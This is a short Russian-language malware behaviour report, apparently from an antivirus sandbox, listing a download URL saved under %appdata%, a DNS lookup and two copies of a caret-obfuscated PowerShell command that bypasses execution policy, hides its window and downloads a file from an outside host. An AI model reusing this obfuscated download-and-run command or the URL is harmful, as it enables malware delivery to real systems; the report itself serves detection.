Техническая информация
- http://bestflowstou.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^owE^r^SH^El^L^.Exe -E^x^EcUTIo^NpOLi^C^y^ bypaS^s -nOpr^O^FI^LE -^w^In^Do^WS^Tyl^E ^HidDE^n ^(NEW^-o^bjEc^t ^Sys^TEm.^nEt^.wE^B^cli^E^nt).DOw^nLO^aD^f^I^le(^'http://best...
- DNS ASK be####owstou.wang
- '<SYSTEM32>\cmd.exe' /C "p^owE^r^SH^El^L^.Exe -E^x^EcUTIo^NpOLi^C^y^ bypaS^s -nOpr^O^FI^LE -^w^In^Do^WS^Tyl^E ^HidDE^n ^(NEW^-o^bjEc^t ^Sys^TEm.^nEt^.wE^B^cli^E^nt).DOw^nLO^aD^f^I^le(^'http://best...' (со скрытым окном)